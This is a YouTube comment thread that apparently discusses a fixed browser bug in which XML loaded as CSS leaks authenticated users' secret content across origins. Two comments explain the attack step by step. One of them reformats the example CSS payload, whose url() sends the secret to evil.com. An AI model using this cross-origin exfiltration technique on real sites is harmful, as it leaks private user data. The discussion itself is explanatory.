I’m glad! I was worrying it was too long

@@LiveOverflow holy crap they are very good, can't wait to see more videos like this.. 😯

20 minutes? 5 minutes? Which video did you watch? I'm sure this was a 2 minutes video

Yes, I need this in my life.

Was about to comment the same thing :)

Yes please

I like the idea, but they need to be even more dramatic! With multiple voice actors over-acting poorly. I can help! I'm good at over-acting and I have a quality mic.

Reenactment for the win!

@@darkopz no need to advertise security issues though

@@p00lking This was not public before it was fixed. They don't and never have advertised security issues. They do however disclose all information about it once it is confirmed as being fixed in a security patch.

i can agree that we get more and more seniors replaced by juniors because for business all that matters is whether it works and not if it is secure or a well thought solution

Stricter parsers would be great, it would force developers to write better and more secure web applications, but at this point it's hard to go from lax to strict parsing as it would probably break a lot of web applications - even big ones as the engineers mentioned. For now, all we can do is patch it up and pray it won't break before we get to the finish line (if it exists).

Yeah I had a little chuckle when he said that lax parsers make developer's lives easier. I would not be surprised if 50% or more of the security issues on the web are caused by the "convenience" of the code still running even though it has syntax errors. And I am sure it is incredibly fun writing code for different versions of different browsers, and not knowing when something fails, because it will, run what it can and skip what it can't. Uuuuggh. I am biased though, I prefer statically typed languages. Often times I wonder what the web would look like today if things had been different. I'm sure there would still be problems, after all, your regular C/C++ programs still have critical bugs from time to time. But I do think the amount would be substantially less if the web used languages with a stricter attitude when it comes to interpreting/compiling.

@@danielhd6719 or people age...

@@Mjarlund It shouldn't really be that difficult. The key here is that sites should be able to opt in for a stricter world. We had this part ways with XHTML Strict mode and with JS 'use strict'. CSS is the odd one out without a strict mode. I think it could be even better if servers could issue for strict interpretations whole sale using HTTP header. This way sites that know they can afford to be strict can take advantage of strictness, while sites that still had to catch up, can still do that.

Is that really the solution? No secret data will ever be stored in a .css file?

@@shelvacu Why would you store secret data in a .css in the first place? That would just be developer's fault

Mr. President, they've stolen all our nuclear codes... using Local HTML XSS CSS Vulnerabilities.

haha:D

> yes

Software Engineer describes a certain type of work not a certification. There's lots of early Software Engineers who never got a CS or engineering degree and there's those who have either degree.

But I will add that some Engineers might take offense to people who call themselves Software Engineers especially Engineers from not software fields.

Nope

I didn't understand it either at first, but I think I do now. The important thing is that the XML is not generated by an attacker or hosted on an attacker's server. The attacker only writes the CSS fragments that appear in the XML. 1. An attacker finds a web service to target, which generates XML files through an API. 2. The attacker submits user-generated content to the web service, containing the CSS fragments. 3. The web service makes the XML file containing the user generated CSS available through its API, as expected. 4. The attacker tricks a user of the target web service into visiting the attacker's own web page, which loads the XML from the target web service API as a stylesheet. 5. Because the "CSS" file is loaded from the target site, it uses the unsuspecting user's active authentication session for the target site (either through cookies or some other means), and so the secret comment that only the authenticated user should see is loaded as part of the "CSS" file. Crucially, if it had been loaded as an XML file, then, under same-origin policy, the attacker's site would not have been able to read its contents. 6. The CSS parser tries to interpret the XML file as CSS. As parsed, the background image URL for the body element contains the 'secret' content from the XML file. The browser doesn't actually have to request the background image from the server in order to leak the secret. The URL need not even point to a domain controlled by the attacker, which would risk revealing their identity. Javascript on the attacker's page can simply read the URL from the supposed "CSS" using window.getComputedStyle and then do whatever it likes with the information. The same-origin policy is thereby violated.

It helped for me to reformat the code example: blah { blah:0 } body { background-image: url('www.evil.com/ some secret comment ');} The XML is generated by an external uncontrolled API, but user data can be submitted. In this case the attacker carefully created two comments surrounding the comment of a legitimate user which they are unable to view. The two comments form the start and end of a valid CSS string, with the legitimate user's comment in the middle becoming part of a background-image URL. The attacker then embeds a link to this XML API within their own website but tells the browser to load it as CSS. When the API is accessed by an authenticated (with cookies) user it will return the XML shown above, with the secret data included. The attacker's CSS is then parsed and a GET request to evil.com is made with the secret data inside.

Doing cross-domain authenticated requests is a major part of the internet. Servers are unable to do "if headers.origin == this_site", because that would break most things the server is used for.

I just recently started Chrome with "--allow-file-access-from-file --disable-web-security" because the 1password anywhere HTML thingy didn't work and I needed it once in a lifetime because I was on the go without my hardware. Sometimes I wish that local file serving would get some more love. As you said, work out a folder based origin or something. We used to be able to create quite some useful tools with just a folder and some HTML/JS in it. Sure it can be malice but surely something could be done. If I could (with permission ofc, like with extensions) access the actual file system and invoke a command line utility (quasi a basic nodejs) I could reduce my big Electron app to a

lol

You may be too small of a cog in said big company's product use case to bear responsibility for whatever security hole you create. With errors come more jobs created for fixing said error, you could put it in a positive light this way :)

@@Tudorgeable Totally makes sense :)

Not at all?

his drawing skills have definitely improved

I’m cheating. Tracing other pictures.

LiveOverflow Now that's disappointing, I was just about to ask for a $200 yiff commission :^)

@@TheOnlyGeggles Oh my, oh my. That one comment just made the purest like 25% of the furry community cry and be disappointed at you.

MiREK Well, I mean the animation at 5:09 in the video does kind of make it seem like a tease, so it wouldn't be too big of a leap to think he would draw NSFW stuff...

This is so sad, Alexxx play despacito.

It's just a rainbow

@@matrix8934 it's not

Matrix 89 a six-colored-rainbow in the exact colors of the pride flag

Jochem Kuijpers that landed there by accident because this is the first thing you think of when drawing a sketch of imgur